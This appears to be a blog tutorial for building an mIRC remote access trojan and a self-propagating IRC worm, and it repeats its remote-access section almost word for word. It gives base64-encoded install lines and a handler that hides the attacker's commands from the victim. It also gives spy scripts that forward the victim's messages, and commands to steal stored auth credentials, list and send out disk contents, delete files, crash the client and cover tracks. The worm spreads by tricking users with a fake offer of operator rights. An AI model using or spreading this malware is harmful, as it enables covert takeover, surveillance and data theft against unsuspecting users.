Shared via Mohammad Ahmadi Bidakhvidi.
It's possible to obtain remote control over another mIRC Client when using the script that will be explained here. You can however also test this on one client. However the best use is to remotely control your bot on another computer (PC) over the internet or over a network. This will give you the ability to do every command you want. This tutorial is written for a layman, so you don't need to actually understand IRC script, it's easy to understand and easy to use. No real pre-knowledge required. Of course this can be used abusively, however the author only supports the legal (educational) use. You can edit this code easily to let it propagate on your own network. Also look at the mIRC Self-Propagating Script given after the remote access script.
It is also possible to make complete bots with this script in a very easy way, without using other programming languages (C, VB, ...).
IRC Remote Access Script
Install on remote computer (Infect the victim)
The script can be activated by the remote PC when he writes the next command:
//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg YOURNICK Hello World
YOURNICK = your nick. The remote computer will message you “Hello World” once he writes the command. You can edit it or just delete the “ | msg YOURNICK Hello World” part.
This is what the command does: it will make a new .mrc file czm and put this in it (which is encoded in the command): on ^*:text:ins*:?:{ . $+ $2- | haltdef }
The haltdef will block your messages to the remote PC beginning with “ins”. With this the user can’t see your commands, so he wont have a clue who is controlling his mIRC. You can naturally leave that part out of the command when you want to see the messages on the remote computer. However most of the times you don't want the remote computer to "read" all the messages, since they are irrelevant (in the bot case by example).
Example:
/msg bot ins msg #channel hi
This will let the bot message #channel the “hi” message, but the remote PC will NOT see it, all others in the channel will see. And the bot will not see your message “ins msg #channel hi” because it will be blocked by “haltdef”. Nice isn’t it? If this has a bot application in this way the bot doesn't get all the garbage data that it doesn't need.
When the bot has executed that command the remote script is active. You can add a spy function if you want (this can cause him an excess flood if he is on too much “popular” channels (channel with much activity or chatting). For adding the spy part (it will send you all his activity, messages received, message sent and commands executed) execute the next commands:
Spy the remote PC (e.g. logging the activities for bots)
/msg bot ins write -c myscript.mrc
/msg bot ins unload -rs myscript.mrc
/msg bot insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg bot ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }
/msg bot ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg bot ins load -rs myscript.mrc
Once done that, you’ll receive the msgs immediately. You can let the spy function stop by typing the next command:
/msg bot ins unload -rs myscript.mrc
Note: bot = the nick of the client who has executed that command, and who has the remote script activated RAT (aka Trojan).
Sometimes you want to partly spy the remote PC, by example only read the private messages. Not the messages from the channels he is in, with this you will have less chance that he will flood himself of the server (excess flood). So the spy script becomes:
/msg bot ins write -c myscript.mrc
/msg bot ins unload -rs myscript.mrc
/msg bot insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg bot ins write myscript.mrc on *:TEXT:*:?: { .msg YOURNICK $timestamp <- < $+ $nick $+ > $1- }
/msg bot ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg bot ins load -rs myscript.mrc
YOURNICK is your nick, and bot is the nick of the remote client.
Make other remote files (.mrc)
You can make remote files yourself and add usefull functions in it.
/msg bot insert write -c YOURSCRIPTNAME.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
/msg bot ins .load –rs YOURSCRIPTNAMEt.mrc
Use of the Trojan
REMOVE FILE :
/msg bot ins remove C:\Textfile.txt
OPEN SITE:
/msg bot ins url www.site.com
JOIN CHANNEL:
/msg bot ins join #channel
PART CHANNEL:
/msg bot ins part #channel
QUERY USER:
/msg bot ins query user
MSG USER:
/msg bot ins msg user
INVITE USER:
/msg bot ins invite user #channel
BAN USER:
/msg bot ins ban #channel user
KICK USER:
/msg bot ins kick #channel user
IGNORE USER:
/msg bot ins ignore *!*@host.com
UNIGNORE USER:
/msg bot ins unignore *!*@host.com
CHANGE NICK:
/msg bot ins nick thenickyouwant
OP USER:
/msg bot ins mode #channel +o user
VOICE USER:
/msg bot ins mode #channel +v user
CHANGE TOPIC:
/msg bot ins topic #channel text
RECEIVE FILE:
/msg bot ins dcc send user file
or
/msg bot ins dcc send user C:\something.sth
EDIT TEXT:
/msg bot ins write -l1 C:\TESTING.txt thetextyouwanttoedit
(-l1 --> first line)
READ A PIECE OF FILE (LIKE PERFORM):
following commands must be executed after eachother:
/msg bot ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }
/msg bot ins .load -rs mab
/msg bot ins abcd123
SEARCH HARD DISK FOR A FILE:
/msg bot ins write MAB1 alias MAB1 { .echo $findfile(C:\,porn.*,0,msg user $1-) }
/msg bot ins .load -rs MAB1
/msg bot ins MAB1
LET HIS mIRC CRASH:
/msg bot ins write MAB2 alias MAB2 { while (1 != 2) { beep } }
/msg bot ins .load -rs MAB2
/msg bot ins MAB2
SCAN HIS HARD DISK AND SAVE IT AS .txt:
//echo $findfile(c:,*.*,0,write C:\M_A_B.txt $1-)
Note: Probably you want this file, well you do this:
/msg bot ins dcc send YOURNICK C:\M_A_B.txt
** Important note **
The bot will see the send dialog, so act quick, for security reasons i suggest to write another trojan on another file; like:
/msg bot write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs MyNewScript.mrc
TURN THE AUTO JOIN ON INVITE ON (or OFF)
/msg bot ins ajinvite on
LET THE BOT MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:
/msg bot ins amsg <the message you want him to say on all channels>
CHANGE THE BOT'S ALTERNATIVE NICK:
/msg bot ins anick <nickname>
CHANGE THE BOT'S BACKGROUND PICTURE:
/msg bot ins background [-aemsgdluhcfnrtpx] [window] [filename]
with
-a = active window
-m = main mIRC window
-s = status window
-g = finger window
-d = single message window
-e = set as default
-cfnrtp = center, fill, normal, stretch, tile, photo
-l = toolbar
-u = toolbar buttons
-h = switchbar
-x = no background picture
LET THE "mIRC CHANNEL CENTRAL" OF A CHANNEL POP UP:
/msg bot ins channel #CHANNELNAME
Note: the bot must be on #CHANNELNAME
CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:
/msg bot ins clearall [-snqmtgu]
s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.
LET THE BOT CLIPBOARD A SPECIFIED TEXT:
/msg bot ins clipboard <the text you want to be clipboarded>
CLOSE THE OPEN QUERIES OF THE BOT:
/msg bot ins close
LET THE BOT QUIT mIRC:
/msg bot ins quit <the quit message you want>
LET THE BOT DISCONNECT FROM SERVER:
/msg bot ins disconnect
LET THE BOT CHANGE SERVER:
/msg bot ins server the.server.you.want
LET THE BOT OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:
/msg bot ins server -m
/msg bot ins server the.server.you.want
LET THE BOT GIVE YOU FLAGS (if he is able to):
/msg bot ins msg |TheBot| chanlev #channel YOURNICK +flag
Note:
|TheBot| = the bot who can give flags
Chanlev = can be different, sometimes it is also, "adduser"
flag = the flag you want
YOURNICK = your nick
CHANGE THE BOT'S FONT AND FONT SIZE:
/msg bot ins font -asgbd <fontsize> <fontname>
CHANGE THE BOT'S FULL NAME:
/msg bot ins fullname <name>
LET THE BOT REJOIN A CHANNEL:
/msg bot ins hop #CHANNEL
MAKE A NEW DIRECTORY ON THE BOT'S HARD DISK:
/msg bot ins mkdir <dirname>
NOTE:
bot = nick of the remote client
user = your nick
IRC Self-Propagating Script
In this tutorial I will try to show a method to make a self replicating script for mIRC. This tutorial is for educational use only, to explore how mIRC script works and how you can protect yourself against these threats. The author does not take any responsibility for the damages one can cause using this script. If you do not agree with these terms I suggest you stop reading this tutorial.
Tutorial mIRC Self-Propagating Script
First of all I need to notice you that this script is allows remote controlling the client. This means that people (eventually bots), that have this script running, can be controlled by you via IRC. It is possible for the script to propagate in a natural way.
It is also possible to make complete bots with this script in a very easy way, without using other programming languages (C, VB, ...).
IRC Remote Access Script
Install on remote computer (Infect the victim)
The script can be activated by the remote PC when he writes the next command:
//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg YOURNICK Hello World
YOURNICK = your nick. The remote computer will message you “Hello World” once he writes the command. You can edit it or just delete the “ | msg YOURNICK Hello World” part.
This is what the command does: it will make a new .mrc file czm and put this in it (which is encoded in the command): on ^*:text:ins*:?:{ . $+ $2- | haltdef }
The haltdef will block your messages to the remote PC beginning with “ins”. With this the user can’t see your commands, so he wont have a clue who is controlling his mIRC. You can naturally leave that part out of the command when you want to see the messages on the remote computer. However most of the times you don't want the remote computer to "read" all the messages, since they are irrelevant (in the bot case by example).
Example:
/msg bot ins msg #channel hi
This will let the bot message #channel the “hi” message, but the remote PC will NOT see it, all others in the channel will see. And the bot will not see your message “ins msg #channel hi” because it will be blocked by “haltdef”. Nice isn’t it? If this has a bot application in this way the bot doesn't get all the garbage data that it doesn't need.
When the bot has executed that command the remote script is active. You can add a spy function if you want (this can cause him an excess flood if he is on too much “popular” channels (channel with much activity or chatting). For adding the spy part (it will send you all his activity, messages received, message sent and commands executed) execute the next commands:
Spy the remote PC (e.g. logging the activities for bots)
/msg bot ins write -c myscript.mrc
/msg bot ins unload -rs myscript.mrc
/msg bot insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg bot ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }
/msg bot ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg bot ins load -rs myscript.mrc
Once done that, you’ll receive the msgs immediately. You can let the spy function stop by typing the next command:
/msg bot ins unload -rs myscript.mrc
Sometimes you want to partly spy the remote PC, by example only read the private messages. Not the messages from the channels he is in, with this you will have less chance that he will flood himself of the server (excess flood). So the spy script becomes:
/msg bot ins write -c myscript.mrc
/msg bot ins unload -rs myscript.mrc
/msg bot insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg bot ins write myscript.mrc on *:TEXT:*:?: { .msg YOURNICK $timestamp <- < $+ $nick $+ > $1- }
/msg bot ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg bot ins load -rs myscript.mrc
YOURNICK is your nick, and bot is the nick of the remote client.
Make other remote files (.mrc)
You can make remote files yourself and add usefull functions in it.
/msg bot insert write -c YOURSCRIPTNAME.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
/msg bot ins .load –rs YOURSCRIPTNAMEt.mrc
Use of the Trojan
/msg bot ins remove C:\Textfile.txt
OPEN SITE:
/msg bot ins url www.site.com
JOIN CHANNEL:
/msg bot ins join #channel
PART CHANNEL:
/msg bot ins part #channel
QUERY USER:
/msg bot ins query user
MSG USER:
/msg bot ins msg user
INVITE USER:
/msg bot ins invite user #channel
BAN USER:
/msg bot ins ban #channel user
KICK USER:
/msg bot ins kick #channel user
IGNORE USER:
/msg bot ins ignore *!*@host.com
UNIGNORE USER:
/msg bot ins unignore *!*@host.com
CHANGE NICK:
/msg bot ins nick thenickyouwant
OP USER:
/msg bot ins mode #channel +o user
VOICE USER:
/msg bot ins mode #channel +v user
CHANGE TOPIC:
/msg bot ins topic #channel text
RECEIVE FILE:
/msg bot ins dcc send user file
or
/msg bot ins dcc send user C:\something.sth
EDIT TEXT:
/msg bot ins write -l1 C:\TESTING.txt thetextyouwanttoedit
(-l1 --> first line)
READ A PIECE OF FILE (LIKE PERFORM):
following commands must be executed after eachother:
/msg bot ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }
/msg bot ins .load -rs mab
/msg bot ins abcd123
SEARCH HARD DISK FOR A FILE:
/msg bot ins write MAB1 alias MAB1 { .echo $findfile(C:\,porn.*,0,msg user $1-) }
/msg bot ins .load -rs MAB1
/msg bot ins MAB1
LET HIS mIRC CRASH:
/msg bot ins write MAB2 alias MAB2 { while (1 != 2) { beep } }
/msg bot ins .load -rs MAB2
/msg bot ins MAB2
SCAN HIS HARD DISK AND SAVE IT AS .txt:
//echo $findfile(c:,*.*,0,write C:\M_A_B.txt $1-)
Note: Probably you want this file, well you do this:
/msg bot ins dcc send YOURNICK C:\M_A_B.txt
** Important note **
The bot will see the send dialog, so act quick, for security reasons i suggest to write another trojan on another file; like:
/msg bot write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs MyNewScript.mrc
TURN THE AUTO JOIN ON INVITE ON (or OFF)
/msg bot ins ajinvite on
LET THE BOT MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:
/msg bot ins amsg <the message you want him to say on all channels>
CHANGE THE BOT'S ALTERNATIVE NICK:
/msg bot ins anick <nickname>
CHANGE THE BOT'S BACKGROUND PICTURE:
/msg bot ins background [-aemsgdluhcfnrtpx] [window] [filename]
with
-a = active window
-m = main mIRC window
-s = status window
-g = finger window
-d = single message window
-e = set as default
-cfnrtp = center, fill, normal, stretch, tile, photo
-l = toolbar
-u = toolbar buttons
-h = switchbar
-x = no background picture
LET THE "mIRC CHANNEL CENTRAL" OF A CHANNEL POP UP:
/msg bot ins channel #CHANNELNAME
Note: the bot must be on #CHANNELNAME
CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:
/msg bot ins clearall [-snqmtgu]
s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.
LET THE BOT CLIPBOARD A SPECIFIED TEXT:
/msg bot ins clipboard <the text you want to be clipboarded>
CLOSE THE OPEN QUERIES OF THE BOT:
/msg bot ins close
LET THE BOT QUIT mIRC:
/msg bot ins quit <the quit message you want>
LET THE BOT DISCONNECT FROM SERVER:
/msg bot ins disconnect
LET THE BOT CHANGE SERVER:
/msg bot ins server the.server.you.want
LET THE BOT OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:
/msg bot ins server -m
/msg bot ins server the.server.you.want
LET THE BOT GIVE YOU FLAGS (if he is able to):
/msg bot ins msg |TheBot| chanlev #channel YOURNICK +flag
Note:
|TheBot| = the bot who can give flags
Chanlev = can be different, sometimes it is also, "adduser"
flag = the flag you want
YOURNICK = your nick
CHANGE THE BOT'S FONT AND FONT SIZE:
/msg bot ins font -asgbd <fontsize> <fontname>
CHANGE THE BOT'S FULL NAME:
/msg bot ins fullname <name>
LET THE BOT REJOIN A CHANNEL:
/msg bot ins hop #CHANNEL
MAKE A NEW DIRECTORY ON THE BOT'S HARD DISK:
/msg bot ins mkdir <dirname>
NOTE:
bot = nick of the remote client
user = your nick
IRC Self-Propagating Script
In this tutorial I will try to show a method to make a self replicating script for mIRC. This tutorial is for educational use only, to explore how mIRC script works and how you can protect yourself against these threats. The author does not take any responsibility for the damages one can cause using this script. If you do not agree with these terms I suggest you stop reading this tutorial.
Tutorial mIRC Self-Propagating Script
First of all I need to notice you that this script is allows remote controlling the client. This means that people (eventually bots), that have this script running, can be controlled by you via IRC. It is possible for the script to propagate in a natural way.
Get Started
It all starts with the next command:
//write mab.mrc $decode(b24gXio6dGV4dDoqOio6IHsgaWYgK
ChpbnMqIGlzd20gJDEtKSAmJiAoJHRhcmdldCA9PSAkbWUpKSB7IC
4gJCsgJDItIHwgaGFsdGRlZiB9IHwgZWxzZWlmICgoYSogaXN3bSA
kMS0pICYmICgkY2hhbikpIHsgLm1zZyBtYWIgaW5mIHwgLm1zZyAk
bmljayBXYW50IHRvIGJlIE9QRVJBVE9SIGluICRjaGFuIGNvcHkvc
GFzdGUgdGhpcy0+IAM0Ly93cml0ZSAuICQgJCsgZGVjb2RlKCAkKy
AkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGN
ocigxMjQpIC5sb2FkIC1ycyB9IH0=,m) | .load -rs mab.mrc
This in one line!
Understanding the Script
We need to mix these two things:
The Self-Propagating Part
on 1:text:*a*:#:{ .ignore $nick | .timer 0 120 .join #mab | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R }
Here is #mab the channel you want to let them join if they've installed the script. But since that would not be very efficient in most cases, we can do it in another way. We let it message you. We change the .timer 0 120 .join #mab with .msg mab_ inf. Where mab_ is your nickname.
With this your self replicating and self propagating script has started, it will now try to spread the script, it will try to personal message some people saying 'itself', while ignoring people. Done that it will try to send itself to other users, and tell them to type the command.
Now we are going to change some things about it so the functionality of the control script is constructive. We will remove the user mode +R on the end of the script, because this will only let users who are authenticated with the official server bot message the script user. Once the script is implemented that is not the objective, so we will remove that from the script. So after this changes we get the next script that we have to merge with the remote control script:
on 1:text:*a*:#:{ .ignore $nick | .msg mab_ inf | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> $chr(3) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs }
The Remote Access (control) Part
on ^*:text:ins*:?:{ . $+ $2- | haltdef }
Mixed they will give us the self propagating remote control script. This means that the script will spread itself, join the certain channel (here: #mab) and after that it will spread itself, and next to that wait for you to control it remotely. So you will have the ability to obtain complete remote access to the client, using mIRC.
I will now try to give more details about that script. So you truly understand this script. In this way it can be easily modified. I will mix it.
So basically we want to mix these two “mechanisms”:
on 1:text:*a*:#:{ DO SOMETHING }
on ^*:text:ins*:?:{ DO SOMETHING ELSE | haltdef }
Solution:
on ^*:text:*:*: {
if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING
elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE
}
In one line:
on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING | elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE }
Where here is DO SOMETHING the remote control part's work and DO SOMETHING ELSE the self propagating part's work.
Integrated (Two parts joined together):
on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) { . $+ $2- | haltdef } | elseif ((a* iswm $1-) && ($chan)) { .msg mab_ inf | .msg $nick Do you want to be OPERATOR in $ $+ chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R } }
Good this is exactly what we needed. Now this doesn’t look very good, so we need to encode it with mIRC. For this we have to write it firstly like something else, some chars have to be written differently because mIRC can misunderstand them and think they are parameters or other things. The next chars have to be written differently: (){},
Why these chars and how can I control it?
If this gives a bad result this means that the char must be written in another way.
Example encoding of “,”:
//say $encode(,,m) This is wrong
//say $encode($+ $chr(44),m) This is correct
Note:
$+ = pasting two strings together
| = $chr(124)
, = $chr(44)
( = $chr(40)
) = $chr(41)
{ = $chr(123)
} = $chr(125)
Sometimes this method is not needed.
For finding the numbers you use this:
//echo -a $asc($?)
This will pop up an input box, just fill in the char and you’ll get the number as result.
It's possible to $encoding now, without bugs. So this is what we get before we start encoding:
So:
/set %var STRING
So for finding it we write the next in mIRC:
//say $encode(%var1 $+ %var2 $+ %var3 $+ %var4,m)
But we don't necessarily need to set is as variables before we encode it. So you can just use the encode line. We find the next as result:
iAoJHRhcmdldCA9PSAkbWUpKSB7IC4gJCsgJDItIHwgaGFsdGRlZi
B9IHwgZWxzZWlmICgoYSogaXN3bSAkMS0pICYmICgkY2hhbikpIHs
gLm1zZyBtYWIgaW5mIHwgLm1zZyAkbmljayBXYW50IHRvIGJlIE9Q
RVJBVE9SIGluICRjaGFuIGNvcHkvcGFzdGUgdGhpcy0+IAM0Ly93c
ml0ZSAuICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3
JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyB
9IH0=
This is the encoded command in one line of code.
No comments:
Post a Comment